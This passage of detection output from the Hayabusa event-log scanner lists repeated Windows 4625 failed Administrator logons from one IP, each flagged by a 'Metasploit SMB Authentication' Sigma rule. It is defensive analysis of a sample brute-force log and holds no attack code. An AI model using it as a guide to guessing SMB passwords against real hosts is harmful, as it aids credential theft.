SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: 
